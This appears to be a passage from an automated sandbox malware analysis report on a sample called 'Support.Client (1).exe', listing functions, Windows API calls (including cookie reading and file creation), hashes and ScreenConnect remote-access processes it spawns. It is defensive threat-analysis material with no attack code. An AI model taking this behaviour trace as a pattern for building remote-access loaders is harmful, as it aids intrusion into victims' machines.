Opcode ID: b2de649b8daaf4e718a67f5bff5b85b271233150e449b9cfc158ac098df4d1f8
Instruction ID: 44393eef78a5ce685229b206a0c5549fb7c084c989ea625649710c39ebebea1a
Opcode Fuzzy Hash: b2de649b8daaf4e718a67f5bff5b85b271233150e449b9cfc158ac098df4d1f8
Instruction Fuzzy Hash: 7CF06236618690BF87F0EB59F996CDA77EFAA51B1035C0819F40ADB692CB30FCC08654

Function 00613D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00613DAD

Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891

_free.LIBCMT ref: 00613DBF
_free.LIBCMT ref: 00613DD2
_free.LIBCMT ref: 00613DE3
_free.LIBCMT ref: 00613DF4

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2e02130b39b3ccd9f3e91f7fb76721adfb9343a9911479267cb669e84881d9f
Instruction ID: c00b73947c8681b7eda488d377b6772a41bb4c0acb7a273a70ad74e3ee763b2a
Opcode Fuzzy Hash: f2e02130b39b3ccd9f3e91f7fb76721adfb9343a9911479267cb669e84881d9f
Instruction Fuzzy Hash: 41F06D78818AA0EB87E16F15FC018C43B23AB66710348266AF5025F3B4CB344592CAC5

Function 00612F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Support.Client (1).exe,00000104), ref: 00612F93
_free.LIBCMT ref: 0061305E
_free.LIBCMT ref: 00613068

Strings

C:\Users\user\Desktop\Support.Client (1).exe, xrefs: 00612F8A, 00612F91, 00612FC0, 00612FF8

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Support.Client (1).exe
API String ID: 2506810119-452514669
Opcode ID: d9e430876050cbb0078b2a0306a250be5cb751ece8b36e9475dcd54fb29c658c
Instruction ID: 1cfe9f036f5678036a6a2d377903195bf40ebd8bdf6d22b7e7120fe7b561da97
Opcode Fuzzy Hash: d9e430876050cbb0078b2a0306a250be5cb751ece8b36e9475dcd54fb29c658c
Instruction Fuzzy Hash: 8C317071A04258EFCB21DF9998819DEBBFEEF99710F18406AE4059B311D6708A82CB51

Function 006125E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00612594,00000000,?,00621B50,?,?,?,00612737,00000004,InitializeCriticalSectionEx,0061BC48,InitializeCriticalSectionEx), ref: 006125F0
GetLastError.KERNEL32(?,00612594,00000000,?,00621B50,?,?,?,00612737,00000004,InitializeCriticalSectionEx,0061BC48,InitializeCriticalSectionEx,00000000,?,006124C7), ref: 006125FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00612622

Strings

api-ms-, xrefs: 00612607

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 499ed4e0449a35db4cc35da5433b9da295b7ec48ddcc9edbe12410be3fbb7c8a
Instruction ID: 2a71e108e2e299e65505573024aec73b074c64c0b6af18f8f440c4575bf285b4
Opcode Fuzzy Hash: 499ed4e0449a35db4cc35da5433b9da295b7ec48ddcc9edbe12410be3fbb7c8a
Instruction Fuzzy Hash: 28E01270644205BBDF111B71EC06BD93B56AB14B52F185421F90DA41E1EBA19AA49984

Function 006157DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00615784,00000000,00000000,00000000,00000000,?,00615981,00000006,FlsSetValue), ref: 0061580F
GetLastError.KERNEL32(?,00615784,00000000,00000000,00000000,00000000,?,00615981,00000006,FlsSetValue,0061C4D8,FlsSetValue,00000000,00000364,?,006144F6), ref: 0061581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00615784,00000000,00000000,00000000,00000000,?,00615981,00000006,FlsSetValue,0061C4D8,FlsSetValue,00000000), ref: 00615829

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 86d20d321a33c1de88e69ce6ed7272e4eacafbbf88c8314bb46387b33e699f70
Instruction ID: 6818816e82ce7cec2627fd9537c7d53e0b5929d2ef0f0aa395d0058c38b77698
Opcode Fuzzy Hash: 86d20d321a33c1de88e69ce6ed7272e4eacafbbf88c8314bb46387b33e699f70
Instruction Fuzzy Hash: 7F014C32615632EFC7604A789C44AD7B75EAF887A1B185525F917D7240C720C841CAE0

Function 00614EBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,00615147,?), ref: 00614EE9
GetACP.KERNEL32(00000000,?,?,00615147,?), ref: 00614F00

Strings

GQa, xrefs: 00614ED7

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID:
String ID: GQa
API String ID: 0-327253900
Opcode ID: 3f07086856eb24bcef9b7f0343bc096588047b297b24269a21cefd99733ae06d
Instruction ID: 892f55d0d20a75df7b444941bf4a04006cfa3f09b019e541acd97f92fbe3e124
Opcode Fuzzy Hash: 3f07086856eb24bcef9b7f0343bc096588047b297b24269a21cefd99733ae06d
Instruction Fuzzy Hash: D7F08C70804504DFCB309B68DC087E87772AB91329F585748E4358F6E1CB7198838B51

Analysis Process: dfsvc.exePID: 6996, Parent PID: 6872COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9B89E8C2 Relevance: 1.8, APIs: 1, Instructions: 281
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetGetCookieW.WININET ref: 00007FFD9B89EAA6

Memory Dump Source

Source File: 00000001.00000002.2550265591.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: 53ebd8a3c5f3e14442ef7196776692721969e8d0b02525c9071feb74380b7d29
Instruction ID: 6a9e3866f245c0b89193f00394240c1daaaafa280a8b2dce712bd1d38b288314
Opcode Fuzzy Hash: 53ebd8a3c5f3e14442ef7196776692721969e8d0b02525c9071feb74380b7d29
Instruction Fuzzy Hash: 88910330608A8D8FEB69DF28C8557E53BE1FF59311F04426FE84DC72A2CB74A9458B81

Function 00007FFD9B8999DB Relevance: 1.7, APIs: 1, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFD9B899B0C

Memory Dump Source

Source File: 00000001.00000002.2550265591.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 43ab2079482a4145c88190bf005688eca6a9ce729314c8afc8ce5049d4f0b79a
Instruction ID: 8c26d04ca6e36c80f6183daa3066585367bd62589cd47890cdd0cc57f3d81d19
Opcode Fuzzy Hash: 43ab2079482a4145c88190bf005688eca6a9ce729314c8afc8ce5049d4f0b79a
Instruction Fuzzy Hash: D251AF7190CA4C8FDB68DF58D859BA9BBE0FF59310F1442AEE04DD3252CB34A8858B81

Function 00007FFD9B891658 Relevance: 1.7, APIs: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2550265591.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38343efdfbb921e40bff9a2763b7ad1934e55b818d71f08f43370fcbca19006b
Instruction ID: 00f22de2fe91660cbbd1d3f8379ad52f15a34ec899fddf329f33330dc092edfb
Opcode Fuzzy Hash: 38343efdfbb921e40bff9a2763b7ad1934e55b818d71f08f43370fcbca19006b
Instruction Fuzzy Hash: 0141C431A0CA4D9FDB59EB688859AB97BE1EF59310F04426FD04ED3292DF74A806C781

Function 00007FFD9B77EEC0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2549680471.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b77d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8dfe9621a20fdd280a99e9d256752b6eb2e5d3822a14944b64bcb25080f862c
Instruction ID: 2d421e7b0f3a9e5a72a53b1d0a86e3eeb7b568777ae9677c09e274a049940355
Opcode Fuzzy Hash: c8dfe9621a20fdd280a99e9d256752b6eb2e5d3822a14944b64bcb25080f862c
Instruction Fuzzy Hash: F141147190EBC84FE396CB3898959523FF0EF56320B1506EFD088CB1B3D665A846C792

Analysis Process: ScreenConnect.WindowsClient.exePID: 7480, Parent PID: 6996COMMON

Execution Graph

Execution Coverage:	14.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B89F67B Relevance: 1.7, APIs: 1, Instructions: 178
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B89F7AC

Memory Dump Source

Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 633f6621c10eb0ca00761c734088de0951abfc54c2a9ac2456ba1891e7edf302
Instruction ID: f44dff7d088c71e915b2383224004343df179a866016f8060c7e57085879909c
Opcode Fuzzy Hash: 633f6621c10eb0ca00761c734088de0951abfc54c2a9ac2456ba1891e7edf302
Instruction Fuzzy Hash: 3951BF71A0CA5C9FDB68DF58D845BA8BBE0FB59310F1442AEE04DD3252CB34A885CB81

Function 00007FFD9B894992 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 00007FFD9B8AF2A6

Memory Dump Source

Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 5cd9a6a29e3e669174f1cfbdd6ec8ed197fa5d2b4c2dac6424a1eab55649124e
Instruction ID: d11d40c12e0ce0537f4c5e28951dc6dbf931bab2f2f4d0953132482960f0a176
Opcode Fuzzy Hash: 5cd9a6a29e3e669174f1cfbdd6ec8ed197fa5d2b4c2dac6424a1eab55649124e
Instruction Fuzzy Hash: 9631C27191CB188FDB1CDF9CE8466FD77E0EB99321F10422EE049D3252DB74A8068B96

Function 00007FFD9B893EAA Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B898542

Memory Dump Source

Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 6d7953a237a61f22582d919ef82eba38cdd1e0ee98bfd54af01f4feeb91be25f
Instruction ID: 4057da36f3fd61b1dca1522dc108e480ef9a488bbd7d416996a9a30966981e05
Opcode Fuzzy Hash: 6d7953a237a61f22582d919ef82eba38cdd1e0ee98bfd54af01f4feeb91be25f
Instruction Fuzzy Hash: 7521E97191CB188FDB289F9DDC4A9F97BE0EB59711F00413EE049D3251DB74B8468B81

Function 00007FFD9B8984B8 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B898542

Memory Dump Source

Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: f56acb01f5454c3450a8575b682988f43b0e0d4a70de1cd34668e27c6da9dc21
Instruction ID: a5a7dba11d6690a301fc092e67294fa205bdbe178ce6f5b3b7d8fe31adc48a1e
Opcode Fuzzy Hash: f56acb01f5454c3450a8575b682988f43b0e0d4a70de1cd34668e27c6da9dc21
Instruction Fuzzy Hash: 5431D77191CB188FDB28DF9D9C4A9F97BE0EB59711F00422FE059D3251DB74A845CB82

Function 00007FFD9B893DFA Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FFD9B8AF4BC

Memory Dump Source

Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 45a664af4997c563ec1763d6903171a38fc961a42c3b302293a7c36bbe2ee9b0
Instruction ID: fd444494bea838da8cbb86f7265b897ee41f93b885b2ba80882d50f4f3a0b630
Opcode Fuzzy Hash: 45a664af4997c563ec1763d6903171a38fc961a42c3b302293a7c36bbe2ee9b0
Instruction Fuzzy Hash: BA21D331A08A1C9FDB5CDF98D449BF97BE0EB69321F00422ED04DD3651DB74A856CB90

Analysis Process: ScreenConnect.ClientService.exePID: 7516, Parent PID: 7480COMMON

Executed Functions

Function 00CA20B5 Relevance: 2.9, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

nCvq, xrefs: 00CA2351
, xrefs: 00CA237E

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq$
API String ID: 0-222869378
Opcode ID: f1b809dc78207ae5caa7f8022da51738df6a9bfe88c94b61806a19a9f02d843a
Instruction ID: b52049555a3f54c5a614feb61533fa7a980f60b2c1159d02ba0aa38eaadec9ad
Opcode Fuzzy Hash: f1b809dc78207ae5caa7f8022da51738df6a9bfe88c94b61806a19a9f02d843a
Instruction Fuzzy Hash: D851D5307002168FC715EB39D8646AEBBF2EF8A314B1484AAD40ADB365EF75DD01CB91

Function 00CA1828 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

$^q, xrefs: 00CA188D
$^q, xrefs: 00CA1899

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 87f28e4a63a9e47557351f99ab89fa6e576de9eb0a169c2863bc9bacaae18cd6
Instruction ID: bd5e992014de08479105a9a97b246c274c75401b703ec122950b63c5951fbe2a
Opcode Fuzzy Hash: 87f28e4a63a9e47557351f99ab89fa6e576de9eb0a169c2863bc9bacaae18cd6
Instruction Fuzzy Hash: 7901B130609344CFD7066B34D41C8193FB1EF4B61571A48EAD8098B266CF359C45CF56

Function 00CA5238 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

(bq, xrefs: 00CA525A

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 8cef29af0211e85926a1aae1bc94f8f116e056334b72de30970a101817f4cef1
Instruction ID: bdb73d9e94a762787c125f0c01d259e3b6f9d0d6bfc5cf5b1e1203bfb08fa2fb
Opcode Fuzzy Hash: 8cef29af0211e85926a1aae1bc94f8f116e056334b72de30970a101817f4cef1
Instruction Fuzzy Hash: 94614774B106099FCB04DFA9D894A6EB7F2FF8E305B1084A8E5069B324DB30ED01DB90

Function 00CA6F41 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00CA70CB

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 5725ef9c35b2200831c2867f056f4f267ce28fdbfda6bc8bd83d9390459b35cf
Instruction ID: f9833030a93dd5b5d3a419b35ef1fc6efd32b2d398217395b6f37b05f61e940b
Opcode Fuzzy Hash: 5725ef9c35b2200831c2867f056f4f267ce28fdbfda6bc8bd83d9390459b35cf
Instruction Fuzzy Hash: 5051F430B042129FDB159B74DC64B6EBBF2BF85708F148A6AE456DB2A1DF309C45CB81

Function 00CA42F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 00CA4311

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: c6e87eedbed564c83c0d69305490bc9ddccd76f3d1a6d105fdc5c86adb750fb6
Instruction ID: ce17d0651939690c8f52a68903f86f4ceb15c2ab054602ad26a2b49a35751eb5
Opcode Fuzzy Hash: c6e87eedbed564c83c0d69305490bc9ddccd76f3d1a6d105fdc5c86adb750fb6
Instruction Fuzzy Hash: 5241BF31A0011A8BCF18EF68D4946ADBBA2EFC4315F14C56AD91A9B255DF74ED02CB90

Function 00CA3480 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

[', xrefs: 00CA3548

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: 255a8bb2bd801a6a36c2d13983436022f9a62413ce50c48400e8f1d3f01ec183
Instruction ID: 41e34f8f35b08f9c74625eb19f7fbc634cd65b2fcd1f9ba20e4a7a848bbab4de
Opcode Fuzzy Hash: 255a8bb2bd801a6a36c2d13983436022f9a62413ce50c48400e8f1d3f01ec183
Instruction Fuzzy Hash: 7D311871B003115FD701AB7C986056E7BE6EF85700394856AE819EB354FFB0EE058BD0

Function 00CA4940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d718904eefa142d18605a1304b8a612eb0d032061b4231e84f2db52cefa69c6
Instruction ID: 1bebc6b319e53714b1da3859080579c4bfef8d52a6232ce175a8e91ff05a547f
Opcode Fuzzy Hash: 7d718904eefa142d18605a1304b8a612eb0d032061b4231e84f2db52cefa69c6
Instruction Fuzzy Hash: AE512C342007068FC728DF2AD894A16B7F2FF8D325B144A5DD4969B7A4DB71ED41CB44

Function 00CA7770 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359de9695d6869c498390e4884a9d603a03a6b15c6d9a9894c0fa5f10043ebed
Instruction ID: e5498fdad13f9756d6876aaa864b92e053f4dc477eb215ddea1c6eca41801e30
Opcode Fuzzy Hash: 359de9695d6869c498390e4884a9d603a03a6b15c6d9a9894c0fa5f10043ebed
Instruction Fuzzy Hash: 76515A70E103199FDB01EFB8D844B9DBBF1EF89300F209659E118AB254DB75A985CB90

Function 00CA776C Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb5a84dc7c6960a00a388c1ab67bb830b7c07133c5d3e5df610020b7f4d8727
Instruction ID: 564795969551b0c5c40f2175d25fde17f279001c9eca33aa99bc57ce7e696ab6
Opcode Fuzzy Hash: acb5a84dc7c6960a00a388c1ab67bb830b7c07133c5d3e5df610020b7f4d8727
Instruction Fuzzy Hash: B5515970E103199FDB01EFA8D844B9DBBF2EF89300F209659E118BB254DB75A985CB90

Function 00CA366C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7925987a1d415dcd55086ad9bc5bda8db539d2f6c38d5a5030aae5ef4ba90be3
Instruction ID: dc79fe3815fb4af7945fbb67632939fc633904051b59abe6b7f543668c2d0909
Opcode Fuzzy Hash: 7925987a1d415dcd55086ad9bc5bda8db539d2f6c38d5a5030aae5ef4ba90be3
Instruction Fuzzy Hash: 4641A1B4600746CFCB20DF29D96465ABBF1FF45715B204A69E466CB3A0EB30EE45CB90

Function 00CA3678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e0d1af38c2d64a91f8067dd5c7d05356d155f25695c18c98e157dc953faa8b
Instruction ID: 2502d63f7bec185f8ab692b6ae594376d79ecc7d2e65e2d7b9bc2dfc25f5b4b0
Opcode Fuzzy Hash: 87e0d1af38c2d64a91f8067dd5c7d05356d155f25695c18c98e157dc953faa8b
Instruction Fuzzy Hash: EB419FB46007468FCB20DF39D964A5AB7F1FF49715B204A29E056CB7A0EB30EE45CB90

Function 00CA3DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced373546a1080f87a0598a44db0464591fb94f794bea6e027f695e63af83f0d
Instruction ID: 9dd7aded175f2d6e3d75063492f28aa8ea6757b02fdfb74f60ff8bbc6280d0e9
Opcode Fuzzy Hash: ced373546a1080f87a0598a44db0464591fb94f794bea6e027f695e63af83f0d
Instruction Fuzzy Hash: 40316D30B002068FDB149F69C4686AEF7F5EF8A358F14846AE416EB750DB70DE048B90

Function 00CA3828 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24949fb4a6ec558ddd3459a2bacceb8ab91903197afc577cdaf666bce99e002c
Instruction ID: dd652312711584f7dd4dfee8e3d17153da8a29e89b630648f5276eb47e70c0b4
Opcode Fuzzy Hash: 24949fb4a6ec558ddd3459a2bacceb8ab91903197afc577cdaf666bce99e002c
Instruction Fuzzy Hash: DF31F871B042859FC711DB68C86456EFFB2EF86310B1480BAD545DB391DB30DE05C7A1

Function 00CA5548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c308ecb53b2550110bceae4f79f49cef5110838a70c6d097a4f2179e8b693fa
Instruction ID: 12ac6e91325a045992dc2fe9ae384ca63ce428cbcb68fc72eb6f811ffc5fc0da
